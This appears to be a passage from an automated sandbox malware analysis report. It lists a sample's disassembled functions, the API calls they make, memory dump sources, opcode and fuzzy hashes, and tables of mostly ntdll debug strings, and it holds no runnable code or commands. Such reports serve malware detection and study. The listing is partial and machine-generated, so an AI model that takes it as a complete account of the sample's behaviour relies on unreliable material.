                                                                                                                                                                                                        • API ID: MessagePostThread
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1836367815-0
                                                                                                                                                                                                        • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                                                                                                                                        • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                                                                                                                                                                        • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                                                                                                                                                                        Function 0041A662 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 257 41a662-41a687 call 41af60 260 41a68c-41a6a1 RtlFreeHeap 257->260
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                        • Opcode ID: 8d1e3537532eb623d236a6a3546ff16b99b25c4043956dc1f6f05b88f1438d51
                                                                                                                                                                                                        • Instruction ID: 52a58ecf24588938703af0cb6cc2dd2c37c65318c41e6f849e563e3d6c474d42
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d1e3537532eb623d236a6a3546ff16b99b25c4043956dc1f6f05b88f1438d51
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ACE0A9B62401046BC718CF75CC85EEB3B28EF89364F248149F90997282CA32E908CAA0
                                                                                                                                                                                                        Function 0041A670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 271 41a670-41a6a1 call 41af60 RtlFreeHeap
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeHeap
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                                                                                        • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                        • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                                                                                                                                                                        Function 0041A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 275 41a7d0-41a804 call 41af60 LookupPrivilegeValueW
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: LookupPrivilegeValue
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3899507212-0
                                                                                                                                                                                                        • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                        • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                                                                                                                                                                        Function 0041A6B0 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExitProcess
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 621844428-0
                                                                                                                                                                                                        • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                        • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                                                                                                                                                                        Function 01842B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: b003731d08c8e663f7dee0e5fd8a3c32939e936461c62b8490a59d0dd8916bbd
                                                                                                                                                                                                        • Instruction ID: 57fb506d1e05276a6af5ba21d2b907921fc80907ee7fc63fa579bbccfd05eaa7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b003731d08c8e663f7dee0e5fd8a3c32939e936461c62b8490a59d0dd8916bbd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 77B02B318010C4C6DB01D72017087073900F7C0301F11C013E2024240FC738C190F231

                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                        Function 01838540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Critical section address, xrefs: 01875230, 018752C7, 0187533F
                                                                                                                                                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 0187534E
                                                                                                                                                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01875215, 018752A1, 01875324
                                                                                                                                                                                                        • undeleted critical section in freed memory, xrefs: 01875236
                                                                                                                                                                                                        • double initialized or corrupted critical section, xrefs: 01875313
                                                                                                                                                                                                        • Invalid debug info address of this critical section, xrefs: 018752C1
                                                                                                                                                                                                        • Address of the debug info found in the active list., xrefs: 018752B9, 01875305
                                                                                                                                                                                                        • 8, xrefs: 018750EE
                                                                                                                                                                                                        • Critical section debug info address, xrefs: 0187522A, 01875339
                                                                                                                                                                                                        • Critical section address., xrefs: 0187530D
                                                                                                                                                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018752D9
                                                                                                                                                                                                        • Thread identifier, xrefs: 01875345
                                                                                                                                                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 018752ED
                                                                                                                                                                                                        • corrupted critical section, xrefs: 018752CD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                        • API String ID: 0-2368682639
                                                                                                                                                                                                        • Opcode ID: 5182a98981e70adbfc3808d1cd83942057aa2f0f66a43c8c752370551eb27069
                                                                                                                                                                                                        • Instruction ID: 2a01cdc2c90ad5eeaf07ff9a4d23e90b0c44765da17ec3b83b06fe1c23b671aa
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5182a98981e70adbfc3808d1cd83942057aa2f0f66a43c8c752370551eb27069
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB818AB1A40358AFDB20CF99C945BAEFBF5FB49B14F244119F904E7280D7B4AA40CB61
                                                                                                                                                                                                        Function 017FD2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                                                        • API String ID: 0-3532704233
                                                                                                                                                                                                        • Opcode ID: 812acd3fd531253e638031237072802264205d6a5bb7bca43ab8f7525bcd40a6
                                                                                                                                                                                                        • Instruction ID: 950ded894802abdd6280f11f2735eacc8f95a6d887211872dd8b72de465300b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 812acd3fd531253e638031237072802264205d6a5bb7bca43ab8f7525bcd40a6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6CB18E715083569FC725DFA8C484A6FFBE8AF88754F05492EFA85D7300D770DA488BA2
                                                                                                                                                                                                        Function 017FD02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 017FD263
                                                                                                                                                                                                        • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 017FD06F
                                                                                                                                                                                                        • @, xrefs: 017FD2B3
                                                                                                                                                                                                        • Control Panel\Desktop\LanguageConfiguration, xrefs: 017FD136
                                                                                                                                                                                                        • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 017FD202
                                                                                                                                                                                                        • @, xrefs: 017FD24F
                                                                                                                                                                                                        • @, xrefs: 017FD09D
                                                                                                                                                                                                        • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 017FD0E6
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                                                        • API String ID: 0-1356375266
                                                                                                                                                                                                        • Opcode ID: ff438912ae2bf0eb3d8aad97ef91a91868f9d6c74cccc3508246aa514e24eb2b
                                                                                                                                                                                                        • Instruction ID: 32d2b057b769e22cf50a81e2ae2fd6ab6e428d5ebd3d1ff3fde85d114f67a63e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ff438912ae2bf0eb3d8aad97ef91a91868f9d6c74cccc3508246aa514e24eb2b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67A15C7150834A9FD721DF58C484B5BFBE9AB84715F01492EFA89D7240DB74DA08CB93
                                                                                                                                                                                                        Function 018AF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                                        • API String ID: 0-2224505338
                                                                                                                                                                                                        • Opcode ID: a88a2c34368efedf41c33fbe528294bde3cc50de310683e2686e61be609c63eb
                                                                                                                                                                                                        • Instruction ID: 9f5e78782f2407ce363aa32c24323449d51595f44d6de5c5caefc69a4c1a5987
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a88a2c34368efedf41c33fbe528294bde3cc50de310683e2686e61be609c63eb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C51F172211289EFE711DFA8C899E2EFBB4EF04B64F14845EF701DB221C675EA40CA11
                                                                                                                                                                                                        Function 017FF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                        • API String ID: 0-523794902
                                                                                                                                                                                                        • Opcode ID: 4adad19bc470dc69714eecc7cfd2762a740ebff425d673b5ea5938ec34ee62e9
                                                                                                                                                                                                        • Instruction ID: 25dfa3816ef5e203cb6bf6588c9fe653a5764c4d02c8e453592620539a29ddf7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4adad19bc470dc69714eecc7cfd2762a740ebff425d673b5ea5938ec34ee62e9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4A42BD722086429FD715DF28C884A6BFBE5FF84714F08496DEA85CB352DB30DA45CB52
                                                                                                                                                                                                        Function 0181B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                        • API String ID: 0-122214566
                                                                                                                                                                                                        • Opcode ID: fb22ca834e5b70be05206e2a2c70ec20ef86315024d4ebe184305eee41f2de7b
                                                                                                                                                                                                        • Instruction ID: cfcd46d7659de6539e787f337d8df871e21d92450a34b8f18261279dec75321e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb22ca834e5b70be05206e2a2c70ec20ef86315024d4ebe184305eee41f2de7b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47C18B32A002199BDB258B6CC890BBEBBBDAF46304F044069ED06DB295D7B0CF84C391
                                                                                                                                                                                                        Function 0183631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                        • API String ID: 0-792281065
                                                                                                                                                                                                        • Opcode ID: e5ad8fe76ba878ea17cb49e9eec96393ae54a953e9997c07e3287c4cb7e6ec2e
                                                                                                                                                                                                        • Instruction ID: 7b6f84632304aa7118ffa5942476ec9f47b17dd7071568d81847eff2dd0b28b7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e5ad8fe76ba878ea17cb49e9eec96393ae54a953e9997c07e3287c4cb7e6ec2e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA913970A01315EBDB35DF1CD849B697BA5BB40764F28012DEA05EB2C1E7B09B01CBD2
                                                                                                                                                                                                        Function 018AF0A5 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                                        • API String ID: 0-1745908468
                                                                                                                                                                                                        • Opcode ID: f9a11c876682a6e253432e8dadc61c134d8bb03ab2e3eca8e64a218a067e52a7
                                                                                                                                                                                                        • Instruction ID: 923f5c41b6187ae67ebf31cc9f000f777b8bd56b749ef7ab7a41c3ea88ec5c94
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f9a11c876682a6e253432e8dadc61c134d8bb03ab2e3eca8e64a218a067e52a7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E191CB31A00649DFEB22DFA8C440AAEFBF2FF59714F48845EE645EB251C775AA40CB10
                                                                                                                                                                                                        Function 017F640D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 018597A0, 018597C9
                                                                                                                                                                                                        • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01859790
                                                                                                                                                                                                        • LdrpInitShimEngine, xrefs: 01859783, 01859796, 018597BF
                                                                                                                                                                                                        • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 0185977C
                                                                                                                                                                                                        • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 018597B9
                                                                                                                                                                                                        • apphelp.dll, xrefs: 017F6446
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                        • API String ID: 0-204845295
                                                                                                                                                                                                        • Opcode ID: b0b3b4b043f2acdec677cdc216244c2809a0c6d129593f661281851573028c06
                                                                                                                                                                                                        • Instruction ID: 81f8f7fd8d8ac9f20f7178e88c00ec8834860e51ac884689cd8312c82efb21d7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0b3b4b043f2acdec677cdc216244c2809a0c6d129593f661281851573028c06
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F51B171648305DBD320DF24C855E6BBBE9EB84748F10051EFA95D7255DA30EA04CB92
                                                                                                                                                                                                        Function 01832594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01871F8A
                                                                                                                                                                                                        • SXS: %s() passed the empty activation context, xrefs: 01871F6F
                                                                                                                                                                                                        • RtlGetAssemblyStorageRoot, xrefs: 01871F6A, 01871FA4, 01871FC4
                                                                                                                                                                                                        • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01871FC9
                                                                                                                                                                                                        • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01871F82
                                                                                                                                                                                                        • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01871FA9
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                        • API String ID: 0-861424205
                                                                                                                                                                                                        • Opcode ID: cafd808f44cb4f826ed11c15929ccbd8494f9e071a669b88c97618db8b1a6768
                                                                                                                                                                                                        • Instruction ID: 18cecd62e2a303fad11df38fc7aed86f591c2d238983dd67cfc8230cdcd594e4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cafd808f44cb4f826ed11c15929ccbd8494f9e071a669b88c97618db8b1a6768
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6B310A72B00215BBE7219A9A9C59F5BBAA9EFA5B54F084059FA01F7241D370EF00C7E1
                                                                                                                                                                                                        Function 0183C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0183C5E3
                                                                                                                                                                                                        • Unable to build import redirection Table, Status = 0x%x, xrefs: 01877FF0
                                                                                                                                                                                                        • LdrpInitializeImportRedirection, xrefs: 01877F82, 01877FF6
                                                                                                                                                                                                        • Loading import redirection DLL: '%wZ', xrefs: 01877F7B
                                                                                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01877F8C, 01878000
                                                                                                                                                                                                        • LdrpInitializeProcess, xrefs: 0183C5E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                        • API String ID: 0-475462383
                                                                                                                                                                                                        • Opcode ID: dc8904af53e07cc3964dd6604a26c161a712a4cd6921b6b5a98fb198fac575be
                                                                                                                                                                                                        • Instruction ID: f9a9e289f69158463468411061dba8d0d291b4077e91ef17bd3a32a8c0485b66
                                                                                                                                                                                                        • Opcode Fuzzy Hash: dc8904af53e07cc3964dd6604a26c161a712a4cd6921b6b5a98fb198fac575be
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5E31C4B16443069FC215EF2CD859E2AB7D5EF94B10F05055CF985EB391DA20EE04CBA3
                                                                                                                                                                                                        Function 0182510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 0182519B
                                                                                                                                                                                                        • Kernel-MUI-Language-SKU, xrefs: 0182534B
                                                                                                                                                                                                        • WindowsExcludedProcs, xrefs: 0182514A
                                                                                                                                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 01825272
                                                                                                                                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 01825167
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
